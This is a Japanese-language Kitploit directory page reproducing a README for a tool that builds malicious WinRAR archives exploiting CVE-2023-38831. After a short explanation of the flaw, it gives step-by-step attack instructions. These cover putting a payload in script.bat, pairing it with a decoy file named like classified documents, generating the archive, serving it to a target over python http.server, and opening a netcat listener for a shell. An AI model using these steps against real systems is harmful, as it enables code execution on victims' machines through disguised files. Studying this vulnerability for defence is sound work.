Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-38831 — # CVE-2023-38831を悪用した悪意のあるRARアーカイブを生成するツール WinRARのCVE-2023-38831を悪用して、ユーザーが無害なファイルを開いた際に任意のコードを実行させる悪意のあるRARアーカイブを生成します。Pythonベースのエクスプロイトジェネレーターとリスナー設定を備えています。 | Kitploit
ツール/GitHubGitHub/asepsaepdin/cve-2023-38831
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubasepsaepdin/cve-2023-38831

CVE-2023-38831

# CVE-2023-38831を悪用した悪意のあるRARアーカイブを生成するツール WinRARのCVE-2023-38831を悪用して、ユーザーが無害なファイルを開いた際に任意のコードを実行させる悪意のあるRARアーカイブを生成します。Pythonベースのエクスプロイトジェネレーターとリスナー設定を備えています。

リポジトリを見る
3年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-38831 - RARLAB WinRAR コード実行脆弱性

Python


⚠️ 教育および許可されたセキュリティ研究目的のみに使用してください

元のエクスプロイト作者

元のPoC作者 b1tg および Group-IB Threat Intelligence に深く感謝します。

説明

RARLabs WinRAR 6.23以前では、ユーザーがZIPアーカイブ内の無害なファイルを表示しようとした際に、攻撃者が任意のコードを実行できる可能性があります。

gambar

この問題は、ZIPアーカイブに無害なファイル(通常の.JPGファイルなど)と、その無害なファイルと同じ名前のフォルダが含まれ、無害なファイルのみにアクセスしようとした際にフォルダの内容(実行可能なコンテンツを含む可能性がある)が処理されるために発生します。これは2023年4月から8月にかけて実際に悪用されました。

デモ

winrar


手順ガイド

  1. まず、script.batファイルをあなたの危険な実行コードに変更します

  2. おとりファイルを挿入します。画像(.png, .jpg)またはドキュメント(.pdf)を推奨します

  3. 次のコマンドを実行してエクスプロイトファイルを生成します

    root@kitploit:~
    python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat  poc.rar
    
  4. python http.server を使用してエクスプロイトファイルをターゲットマシンに送信します。例:

    root@kitploit:~
    python -m http.server
    
  5. 攻撃機でリスナーをセットアップします:

    root@kitploit:~
    nc -nlvp 4444
    
  6. エクスプロイトファイルをダウンロードし、WinRAR 6.23以前のバージョンで開きます


クレジット

  • https://github.com/b1tg/CVE-2023-38831-winrar-exploit
  • https://nvd.nist.gov/vuln/detail/CVE-2023-38831
  • https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
ツールをダウンロード